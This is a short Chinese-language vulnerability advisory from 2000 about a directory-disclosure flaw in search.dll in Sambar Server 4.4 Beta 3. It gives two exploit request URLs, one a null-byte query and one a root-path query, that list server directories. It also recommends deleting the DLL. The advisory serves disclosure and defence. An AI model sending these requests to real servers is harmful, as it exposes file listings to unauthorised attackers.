发布日期：2000-09-17
更新日期：2000-09-18

受影响系统：

Sambar Server 4.4Beta 3

   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0

描述：

---

Sambar Server是一个应用于Windows平台的web server.它的4.4 Beta版中所带的search.dll
存在一个安全问题，允许远程攻击者察看Sambar服务器上的目录。   
   

<*来源: dethy@synnergy.net *>   


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

1. 泄漏当前工作目录的文件列表：
http://server-running-sambar.com/search.dll?search?query=%00&logic=AND


2. 泄漏根目录的文件列表：
http://server-running-sambar.com/search.dll?search?query=/&logic=AND




建议：

---

临时解决方法：

NSFOCUS建议您暂时备份并删除search.dll文件。

厂商补丁：

目前厂商还没有提供补丁或者升级程序

浏览次数：6391
严重程度：0（网友投票）